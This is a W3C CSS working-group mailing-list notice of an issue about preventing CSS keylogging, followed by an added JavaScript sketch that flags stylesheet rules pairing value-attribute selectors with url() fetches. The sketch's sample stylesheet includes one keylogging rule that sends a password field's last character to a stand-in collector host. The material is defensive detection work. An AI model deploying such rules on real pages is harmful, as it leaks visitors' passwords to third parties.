[csswg-drafts] [selectors-4] [backgrounds-3] Prevent CSS keylogging

Ryuno-Ki has just created a new issue for https://github.com/w3c/csswg-drafts:

== [selectors-4] [backgrounds-3] Prevent CSS keylogging ==
Originally I've opened [Bug 1440786](https://bugzilla.mozilla.org/show_bug.cgi?id=1440786) regarding this.

You may have heard about https://github.com/maxchehab/CSS-Keylogging, that is, abusing CSS for keylogging by a mix of [attribute substrings](https://drafts.csswg.org/selectors-4/#attribute-substrings) in selectors and [background-image](https://drafts.csswg.org/css-backgrounds-3/#typedef-image).

My intention was to get ideas on how we as web authors can deal with it.
I am a web developer and user and want to protect my visitors, friends and family against this.
My idea was that, because the browser can't tell the purpose of the background-image from its URL, to flag this combination as suspicious (i.e. console.warn). This way, we can raise awareness of it. An even better way would be to gather data to make an informed decision.

@dveditz of Mozilla's security team [considered a fix a violation of the spec](https://bugzilla.mozilla.org/show_bug.cgi?id=1440786#c3), so I am turning to the spec authors next :-)

Please keep in mind that this is my first interaction with a W3C working group directly (aside from following the MathML mailing list as a reader for a while). I am open to suggestions on how to better file issues.

Many thanks to @dveditz and @dbaron for their support on Mozilla's bug tracker.

Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2426 using your GitHub account

Received on Thursday, 8 March 2018 23:05:52 UTC
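
The flagging idea from the issue above, sketched as a stylesheet check that authors could run over CSS they ship or include (an added example, not code from the issue, the CSSWG or any browser). It assumes the signal of interest is an attribute selector on `value` paired with a `url()` in the same rule; the function names, the sample stylesheet and the `.example` hosts are constructed for illustration, and the regex-based rule splitting is a heuristic, not a full CSS parser.

```javascript
// Constructed sample stylesheet; hosts use the reserved .example TLD.
const SAMPLE_CSS = `
input[type="password"][value$="a"] { background-image: url("https://collector.example/a"); }
@media screen { input[value*="x"] { background: url(/img/x.png); } }
a[href^="https://"] { background-image: url("/icons/external.svg"); }
input[value=""] { border-color: red; } /* attribute match, but no fetch */
.hero { background: url('https://cdn.example/hero.jpg') center / cover; }
`;

// Attribute selector on `value` with any match operator (=, ~=, |=, ^=, $=, *=).
const VALUE_ATTR = /\[\s*value\s*([~|^$*]?=)/i;
// url(...) tokens inside a declaration block: double-quoted, single-quoted or bare.
const URL_TOKEN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;
// Innermost "prelude { declarations }" pairs, so rules nested in @media are seen too.
const RULE = /([^{}]+)\{([^{}]*)\}/g;

function isCrossOrigin(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).origin !== new URL(pageOrigin).origin;
  } catch {
    return true; // unparsable URL: report it rather than hide it
  }
}

// Returns one finding per rule that pairs a [value...] selector with a fetched URL.
function findSuspiciousRules(css, pageOrigin) {
  const findings = [];
  const withoutComments = css.replace(/\/\*[\s\S]*?\*\//g, "");
  for (const [, prelude, body] of withoutComments.matchAll(RULE)) {
    const attr = VALUE_ATTR.exec(prelude);
    if (!attr) continue;
    const urls = [...body.matchAll(URL_TOKEN)]
      .map((m) => m[1] ?? m[2] ?? m[3])
      .filter((u) => u && !u.toLowerCase().startsWith("data:")); // data: URLs cause no request
    if (urls.length === 0) continue;
    findings.push({
      selector: prelude.trim(),
      operator: attr[1],
      urls,
      crossOrigin: urls.some((u) => isCrossOrigin(u, pageOrigin)),
    });
  }
  return findings;
}

for (const f of findSuspiciousRules(SAMPLE_CSS, "https://shop.example")) {
  console.warn(`value selector triggers a fetch: ${f.selector} -> ${f.urls.join(", ")}`);
}
```

The `crossOrigin` field separates rules whose requests leave the page's origin from same-origin ones, which is the distinction a reviewer would triage on first.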